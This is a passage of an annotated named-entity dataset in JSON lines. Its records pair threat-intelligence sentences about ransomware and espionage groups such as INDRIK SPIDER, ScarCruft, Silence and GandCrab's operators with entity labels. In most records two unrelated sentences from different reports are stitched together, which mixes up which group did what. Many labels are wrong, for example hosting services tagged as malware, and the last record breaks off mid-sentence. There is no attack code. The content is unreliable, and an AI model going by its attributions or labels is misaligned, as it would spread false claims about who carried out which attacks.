"label": "Organization"}]} {"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 
's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) .", "spans": [{"start": 56, "end": 65, "label": "System"}, {"start": 108, "end": 131, "label": "Organization"}, {"start": 134, "end": 137, "label": "Organization"}, {"start": 215, "end": 230, "label": "Organization"}]} {"text": "The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": [{"start": 94, "end": 103, "label": "System"}, {"start": 163, "end": 172, "label": "Organization"}]} {"text": "Though the encryption and ransom functionality of BitPaymer was not technically sophisticated , the malware contained multiple anti-analysis features that overlapped with Dridex . ScarCruft uses a multi-stage binary infection scheme .", "spans": [{"start": 50, "end": 59, "label": "System"}, {"start": 171, "end": 177, "label": "System"}, {"start": 180, "end": 189, "label": "Organization"}]} {"text": "Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER , suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges .", "spans": [{"start": 28, "end": 37, "label": "System"}, {"start": 78, "end": 91, "label": "Organization"}, {"start": 251, "end": 258, "label": "Malware"}, {"start": 272, "end": 279, "label": "System"}]} {"text": "The beginning of 2017 also brought a turning point in INDRIK SPIDER 's operation of Dridex . 
This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": [{"start": 54, "end": 67, "label": "Organization"}, {"start": 84, "end": 90, "label": "System"}, {"start": 143, "end": 150, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 173, "end": 178, "label": "Malware"}]} {"text": "CrowdStrike\u00ae Falcon\u00ae Intelligence\u2122 also observed a strong correlation between Dridex infections and BitPaymer ransomware . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it .", "spans": [{"start": 0, "end": 34, "label": "Organization"}, {"start": 78, "end": 84, "label": "System"}, {"start": 100, "end": 120, "label": "System"}]} {"text": "During incidents that involved BitPaymer , Dridex was installed on the victim network prior to the deployment of the BitPaymer malware . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload .", "spans": [{"start": 31, "end": 40, "label": "System"}, {"start": 43, "end": 49, "label": "System"}, {"start": 117, "end": 134, "label": "System"}, {"start": 141, "end": 151, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 208, "end": 210, "label": "System"}]} {"text": "Also unusual was the observation that both Dridex and BitPaymer were spread through the victim network using lateral movement techniques traditionally associated with nation-state actors and penetration testing . 
The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": [{"start": 43, "end": 49, "label": "System"}, {"start": 54, "end": 63, "label": "System"}, {"start": 217, "end": 226, "label": "Organization"}]} {"text": "The information gathered from these engagements , combined with information from prior Dridex IR engagements , provides insight into how INDRIK SPIDER deploys and operates both Dridex and BitPaymer . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester .", "spans": [{"start": 87, "end": 96, "label": "System"}, {"start": 137, "end": 150, "label": "Organization"}, {"start": 177, "end": 183, "label": "System"}, {"start": 188, "end": 197, "label": "System"}, {"start": 248, "end": 255, "label": "Malware"}, {"start": 289, "end": 315, "label": "Indicator"}]} {"text": "In recent BitPaymer IR engagements , Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": [{"start": 10, "end": 34, "label": "System"}, {"start": 37, "end": 56, "label": "Organization"}, {"start": 115, "end": 133, "label": "System"}, {"start": 142, "end": 160, "label": "System"}]} {"text": "With the move to targeting select victims for high-value payouts , the INDRIK SPIDER adversary group is no longer forced to scale its operations , and now has the capacity to tailor its tooling to the victim 's environment and play a more active role in the compromise with \" hands on keyboard \" activity . 
ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": [{"start": 71, "end": 84, "label": "Organization"}, {"start": 333, "end": 350, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}]} {"text": "This web hosting service provider continues to be the hosting provider of choice for the threat actors behind NetTraveler . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": [{"start": 5, "end": 33, "label": "Organization"}, {"start": 54, "end": 70, "label": "Organization"}, {"start": 110, "end": 121, "label": "System"}, {"start": 135, "end": 144, "label": "Organization"}, {"start": 168, "end": 180, "label": "Organization"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 199, "end": 209, "label": "Organization"}]} {"text": "These new tactics of selectively targeting organizations for high ransomware payouts have signaled a shift in INDRIK SPIDER 's operation with a new focus on targeted , low-volume , high-return criminal activity : a type of cybercrime operation we refer to as big game hunting . ScarCruft infected this victim on September 21 , 2018 .", "spans": [{"start": 278, "end": 287, "label": "Organization"}]} {"text": "Later , in January 2018 , a report was released that identified similarities between the BitPaymer ransomware and Dridex malware . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 .", "spans": [{"start": 89, "end": 109, "label": "System"}, {"start": 114, "end": 128, "label": "System"}, {"start": 146, "end": 155, "label": "Organization"}]} {"text": "The report authors renamed the malware \" FriedEx \" . 
ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 53, "end": 62, "label": "Organization"}, {"start": 132, "end": 147, "label": "Organization"}, {"start": 204, "end": 223, "label": "Organization"}]} {"text": "Falcon Intelligence has analyzed this malware and can confirm the overlap between BitPaymer/FriedEx and Dridex malware . Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 82, "end": 99, "label": "System"}, {"start": 104, "end": 118, "label": "System"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 169, "end": 187, "label": "System"}]} {"text": "Though there is no functionality to collect this information in the ransomware itself , the ransomware is deployed by INDRIK SPIDER in parallel with Dridex malware , and the Dridex malware contains modules that may be used to collect information from infected hosts . ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 149, "end": 163, "label": "System"}, {"start": 174, "end": 188, "label": "System"}, {"start": 268, "end": 277, "label": "Organization"}]} {"text": "Falcon Intelligence has acquired multiple decryption tools related to BitPaymer , which confirm the theory that a unique key is used for each infection . 
Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 70, "end": 79, "label": "System"}]} {"text": "Unlike many ransomware operations , which usually just require victims to make the payment and subsequently download a decryptor , INDRIK SPIDER requires the victim to engage in communication with an operator . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 274, "end": 281, "label": "Vulnerability"}, {"start": 288, "end": 301, "label": "Vulnerability"}]} {"text": "Falcon Intelligence has had unique insight into the email dialogue between a victim and an INDRIK SPIDER operator . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 170, "end": 177, "label": "Vulnerability"}, {"start": 184, "end": 197, "label": "Vulnerability"}]} {"text": "Initial victim communication with the INDRIK SPIDER operator , using one of the email addresses provided , results in the operator providing key pieces of information up front , such as the BTC address and the ransom amount . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 .", "spans": [{"start": 38, "end": 51, "label": "Organization"}]} {"text": "It was made clear during communications that INDRIK SPIDER is not willing to negotiate on the ransom amount , explicitly stating that the victim can use multiple Bitcoin exchanges to obtain the number of BTC required , and the exchange rate should be calculated based on the rate posted on the cryptocurrency exchange Bittrex . 
The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 294, "end": 308, "label": "Organization"}, {"start": 369, "end": 374, "label": "System"}, {"start": 375, "end": 383, "label": "Vulnerability"}]} {"text": "Of note , INDRIK SPIDER specifies the geographical location of where the victim should seek help , confirming that they know key information about the victim . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": [{"start": 10, "end": 23, "label": "Organization"}, {"start": 188, "end": 196, "label": "Vulnerability"}, {"start": 214, "end": 219, "label": "System"}]} {"text": "INDRIK SPIDER uses file sharing platforms to distribute the BitPaymer decryptor . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 19, "end": 41, "label": "System"}, {"start": 60, "end": 79, "label": "System"}, {"start": 97, "end": 110, "label": "Organization"}, {"start": 176, "end": 184, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Organization"}]} {"text": "In an extensive email to the victim , the INDRIK SPIDER operator provides a decryptor download link , decryptor deletion link ( to be used following decryptor download ) and a password . 
Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": [{"start": 42, "end": 55, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 252, "end": 260, "label": "Vulnerability"}, {"start": 263, "end": 276, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 308, "end": 311, "label": "System"}]} {"text": "The recommendations provided are not only good advice , but also provide indications of how INDRIK SPIDER breaches organizations and moves laterally until domain controller access is gained . attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": [{"start": 92, "end": 105, "label": "Organization"}, {"start": 226, "end": 232, "label": "System"}, {"start": 277, "end": 284, "label": "Vulnerability"}, {"start": 305, "end": 314, "label": "Organization"}]} {"text": "Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": [{"start": 59, "end": 72, "label": "Organization"}, {"start": 231, "end": 236, "label": "System"}, {"start": 237, "end": 244, "label": "Vulnerability"}, {"start": 247, "end": 260, "label": "Vulnerability"}]} {"text": "INDRIK SPIDER consists of experienced malware developers and operators who have likely been part of the group since the early days of Dridex operations , beginning in June 2014 . 
Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 134, "end": 140, "label": "System"}, {"start": 191, "end": 196, "label": "System"}, {"start": 261, "end": 269, "label": "Vulnerability"}, {"start": 270, "end": 283, "label": "Vulnerability"}]} {"text": "The formation of the group and the modus operandi changed significantly in early 2017 . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 .", "spans": []} {"text": "Dridex operations became more targeted , resulting in less distribution and Dridex sub-botnets in operation , and BitPaymer ransomware operations began in July 2017 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 76, "end": 82, "label": "System"}, {"start": 114, "end": 134, "label": "System"}, {"start": 167, "end": 178, "label": "Organization"}]} {"text": "There is no doubt that BitPaymer ransomware operations are proving successful for Indrik Spider , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . 
We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": [{"start": 23, "end": 32, "label": "System"}, {"start": 33, "end": 43, "label": "System"}, {"start": 204, "end": 217, "label": "Organization"}, {"start": 243, "end": 264, "label": "System"}]} {"text": "There is no doubt that BitPaymer ransomware operations are proving successful for this criminal group , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques .", "spans": [{"start": 23, "end": 32, "label": "System"}, {"start": 33, "end": 43, "label": "System"}, {"start": 249, "end": 270, "label": "System"}, {"start": 295, "end": 307, "label": "Malware"}]} {"text": "Though Dridex is still bringing in criminal revenue for the actor after almost four years of operation , targeted wire fraud operations likely require lengthy planning . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide .", "spans": [{"start": 7, "end": 13, "label": "System"}, {"start": 170, "end": 183, "label": "Organization"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 224, "end": 232, "label": "Organization"}]} {"text": "In scenarios where wire fraud is not as lucrative an option , INDRIK SPIDER might use ransomware to monetize the compromise instead . 
In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack .", "spans": [{"start": 155, "end": 168, "label": "Organization"}, {"start": 203, "end": 216, "label": "Organization"}]} {"text": "INDRIK SPIDER isn't the only criminal actor running big game hunting operations ; The first ransomware to stake a claim for big game hunting was Samas ( aka SamSam ) , which is developed and operated by BOSS SPIDER . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 .", "spans": [{"start": 92, "end": 102, "label": "System"}, {"start": 145, "end": 150, "label": "System"}, {"start": 157, "end": 163, "label": "System"}, {"start": 242, "end": 249, "label": "Vulnerability"}, {"start": 303, "end": 308, "label": "Organization"}]} {"text": "Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . The new threat actor group was eventually named Silence .", "spans": []} {"text": "In July 2017 , INDRIK SPIDER joined the movement of targeted ransomware with BitPaymer . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) .", "spans": [{"start": 77, "end": 86, "label": "System"}]} {"text": "Most recently , the ransomware known as Ryuk came to market in August 2017 and has netted its operators , tracked by Falcon Intelligence as GRIM SPIDER , a significant ( and immediate ) profit in campaigns also targeting large organizations . 
Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": [{"start": 20, "end": 30, "label": "System"}, {"start": 40, "end": 44, "label": "System"}, {"start": 117, "end": 136, "label": "Organization"}, {"start": 140, "end": 151, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}, {"start": 297, "end": 311, "label": "Organization"}]} {"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . Silence also used Russian-language web hosting services .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 67, "end": 91, "label": "System"}, {"start": 129, "end": 149, "label": "Malware"}]} {"text": "The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot ( aka IcedID ) , which was first observed in April 2017 . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as \u2014 Anunak , Corkow , Buhtrap \u2014 usually managed botnets using developed or modified banking Trojans .", "spans": [{"start": 4, "end": 29, "label": "Organization"}, {"start": 123, "end": 129, "label": "System"}, {"start": 136, "end": 142, "label": "System"}, {"start": 268, "end": 284, "label": "Organization"}, {"start": 304, "end": 310, "label": "Malware"}, {"start": 375, "end": 382, "label": "Organization"}]} {"text": "The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . 
They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": [{"start": 4, "end": 18, "label": "System"}, {"start": 285, "end": 329, "label": "Organization"}, {"start": 334, "end": 338, "label": "Organization"}]} {"text": "campaigns involving both BokBot and TrickBot were first identified by CrowdStrike Intelligence in July 2017 . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector .", "spans": [{"start": 25, "end": 31, "label": "System"}, {"start": 36, "end": 44, "label": "System"}, {"start": 70, "end": 94, "label": "Organization"}, {"start": 110, "end": 118, "label": "Organization"}, {"start": 227, "end": 243, "label": "Organization"}]} {"text": "These gtags have been closely associated with LUNAR SPIDER activity . Group-IB detected the first incidents relating to Silence in June 2016 .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 70, "end": 78, "label": "Organization"}]} {"text": "Unit 42 followed network traces and pivoted on the information left behind by this actor , such as open directories , document metadata , and binary peculiarities , which enabled us to find a custom-made piece of malware , that we named \" CapturaTela \" . One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 239, "end": 250, "label": "System"}, {"start": 301, "end": 305, "label": "Organization"}]} {"text": "Our telemetry for this campaign identified email as the primary delivery mechanism and found the first related samples were distributed in August 2018 . 
They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt .", "spans": []} {"text": "Aside from the use of the custom trojan CapturaTela , the actor makes extensive use of several other remote access Trojans to perform its malicious activities . Silence tries to apply new techniques and ACTs of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": [{"start": 40, "end": 51, "label": "System"}, {"start": 101, "end": 122, "label": "System"}]} {"text": "Why would OurMine want to target WikiLeaks ? Silence 's successful attacks currently have been limited to the CIS and Eastern European countries .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 33, "end": 42, "label": "Organization"}]} {"text": "Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 39, "end": 48, "label": "Organization"}]} {"text": "We don't know how OurMine managed to access WikiLeaks 's DNS records , but past experience has shown that their typical modus operandi is simply to log in using their victim 's password . 
Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": [{"start": 44, "end": 53, "label": "Organization"}]} {"text": "Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simply requested that a password reset link be sent to a compromised email address . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": [{"start": 68, "end": 77, "label": "Organization"}, {"start": 81, "end": 93, "label": "Organization"}, {"start": 242, "end": 248, "label": "System"}, {"start": 262, "end": 276, "label": "Organization"}]} {"text": "Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simply requested that a password reset link be sent to a compromised email address . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": [{"start": 74, "end": 83, "label": "Organization"}, {"start": 87, "end": 99, "label": "Organization"}, {"start": 281, "end": 293, "label": "Malware"}, {"start": 298, "end": 314, "label": "Malware"}]} {"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . 
In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": [{"start": 30, "end": 42, "label": "Organization"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 145, "end": 153, "label": "Organization"}, {"start": 256, "end": 268, "label": "Malware"}, {"start": 273, "end": 289, "label": "Malware"}]} {"text": "Last year , OurMine victimized Marvel , The New York Times , and even the heads of some of the biggest technology companies in the world . In two months , the group returned to their proven method and withdrew funds again through ATMs .", "spans": [{"start": 12, "end": 19, "label": "Organization"}, {"start": 40, "end": 58, "label": "Organization"}, {"start": 103, "end": 123, "label": "Organization"}]} {"text": "Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek \u2014 the CEOs of Facebook , Twitter , Google and Spotify , respectively \u2014 have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised . In September 2017 , we discovered a new targeted attack on financial institutions .", "spans": [{"start": 76, "end": 84, "label": "Organization"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 97, "end": 103, "label": "Organization"}, {"start": 226, "end": 236, "label": "Organization"}, {"start": 333, "end": 355, "label": "Organization"}]} {"text": "The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . 
In September 2017 , we discovered a Silence attack on financial institutions .", "spans": [{"start": 40, "end": 50, "label": "Organization"}, {"start": 102, "end": 109, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 317, "end": 339, "label": "Organization"}]} {"text": "OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . The infection vector is a spear-phishing email with a malicious attachment .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 38, "end": 48, "label": "Organization"}, {"start": 100, "end": 107, "label": "Organization"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 176, "end": 185, "label": "Organization"}, {"start": 215, "end": 223, "label": "Organization"}, {"start": 228, "end": 238, "label": "Organization"}]} {"text": "The group 's primary goal is demonstrating to companies that they have weak security . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": [{"start": 181, "end": 188, "label": "Organization"}, {"start": 242, "end": 248, "label": "System"}, {"start": 276, "end": 290, "label": "Organization"}]} {"text": "US intelligence agencies pinned the breach on North Korea ( one of the hacking group 's demands was that Sony pull The Interview , Seth Rogen 's comedy about a plot to assassinate Kim Jong-Un ) . 
The spear-phishing infection vector is still the most popular ACT to initiate targeted campaigns .", "spans": [{"start": 3, "end": 24, "label": "Organization"}, {"start": 105, "end": 109, "label": "Organization"}]} {"text": "Of course , Sony ( one of Vevo 's joint owners ) fell victim to a devastating hack in 2014 after a group of hackers calling themselves the \" Guardians of Peace \" dumped a wealth of its confidential data online . We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 .", "spans": [{"start": 12, "end": 16, "label": "Organization"}]} {"text": "The cryptominer employed by Pacha Group , labeled Linux.GreedyAntd by Intezer , was completely undetected by all leading engines , demonstrating the sophistication of this malware . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": [{"start": 50, "end": 66, "label": "System"}, {"start": 70, "end": 77, "label": "Organization"}, {"start": 363, "end": 372, "label": "Organization"}, {"start": 378, "end": 396, "label": "Organization"}]} {"text": "Intezer has evidence dating back to September 2018 which shows Pacha Group has been using a cryptomining malware that has gone undetected on other engines . As shown above , the threat runs several native binaries to collect useful information for its recon phase .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 198, "end": 213, "label": "Malware"}]} {"text": "The new miner employed by Pacha Group , named Linux.GreedyAntd , has shown to be more sophisticated than the average Linux threat , using evasion techniques rarely seen in Linux malware . 
The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory .", "spans": [{"start": 26, "end": 37, "label": "Organization"}, {"start": 46, "end": 62, "label": "System"}, {"start": 172, "end": 185, "label": "System"}, {"start": 299, "end": 321, "label": "Organization"}]} {"text": "Pacha Group is believed to be of Chinese origin , and is actively delivering new campaigns , deploying a broad number of components , many of which are undetected and operating within compromised third party servers . These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting .", "spans": [{"start": 0, "end": 11, "label": "Organization"}]} {"text": "We have labeled the undetected Linux.Antd variants , Linux.GreedyAntd and classified the threat actor as Pacha Group . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March .", "spans": [{"start": 53, "end": 69, "label": "System"}]} {"text": "Based on our findings Linux.GreedyAntd 's operations closely resemble previous cryptojacking campaigns deployed by Pacha Group in the past . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . 
Given its use in more advanced social engineering campaigns against women 's rights activists , the label seems particularly apt .", "spans": [{"start": 22, "end": 38, "label": "System"}, {"start": 271, "end": 275, "label": "System"}, {"start": 342, "end": 370, "label": "Organization"}, {"start": 379, "end": 404, "label": "Organization"}]} {"text": "Among the artifacts hosted in GreedyAntd 's servers , we managed to find a single component not related to the same cryptojacking operation just previously discussed and leveraged by Pacha Group . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": [{"start": 30, "end": 40, "label": "System"}, {"start": 264, "end": 272, "label": "Organization"}]} {"text": "It was one of the few ransomware strains that were being mass-distributed via email spam and exploit kits , but also as part of targeted attacks against high-profile organizations ( a tactic known as big-game hunting ) at the same time . The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status .", "spans": [{"start": 153, "end": 179, "label": "Organization"}, {"start": 242, "end": 246, "label": "Organization"}, {"start": 286, "end": 297, "label": "Organization"}, {"start": 302, "end": 322, "label": "Organization"}, {"start": 330, "end": 361, "label": "Organization"}]} {"text": "The GandCrab author also had a spat with South Korean security vendor AhnLab last summer after the security firm released a vaccine for the GandCrab ransomware . 
In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 70, "end": 76, "label": "Organization"}, {"start": 99, "end": 112, "label": "Organization"}, {"start": 140, "end": 159, "label": "System"}, {"start": 180, "end": 184, "label": "Organization"}]} {"text": "Recently , Sophos Labs has observed criminal groups scanning the internet for open MySQL databases running on Windows systems , which they tried to infect with GandCrab . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" .", "spans": [{"start": 11, "end": 22, "label": "Organization"}, {"start": 160, "end": 168, "label": "System"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 305, "end": 307, "label": "Indicator"}]} {"text": "CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . 
All the samples appear to have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently ongoing .", "spans": [{"start": 0, "end": 24, "label": "Organization"}, {"start": 47, "end": 60, "label": "Organization"}, {"start": 82, "end": 101, "label": "System"}, {"start": 415, "end": 418, "label": "System"}]} {"text": "Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian .", "spans": [{"start": 43, "end": 51, "label": "System"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 112, "end": 128, "label": "Organization"}]} {"text": "CrowdStrike\u00ae Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . For the sake of narrative we are going to focus exclusively on those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": [{"start": 0, "end": 25, "label": "Organization"}, {"start": 48, "end": 61, "label": "Organization"}, {"start": 83, "end": 102, "label": "System"}, {"start": 394, "end": 407, "label": "Organization"}, {"start": 412, "end": 420, "label": "Organization"}]} {"text": "PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab , which has been active since January 2018 . 
Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 100, "end": 108, "label": "System"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 177, "end": 207, "label": "Organization"}, {"start": 250, "end": 264, "label": "Organization"}, {"start": 271, "end": 290, "label": "Organization"}]} {"text": "PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 34, "end": 53, "label": "System"}, {"start": 202, "end": 212, "label": "Organization"}, {"start": 217, "end": 231, "label": "Organization"}]} {"text": "The main catalyst for dedicated development by PINCHY SPIDER , however , has been an ongoing battle with cybersecurity providers that are actively developing GandCrab mitigations and decryptors . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": [{"start": 47, "end": 60, "label": "Organization"}, {"start": 105, "end": 128, "label": "Organization"}, {"start": 158, "end": 166, "label": "System"}, {"start": 226, "end": 234, "label": "Organization"}]} {"text": "In February , PINCHY SPIDER released version 5.2 of 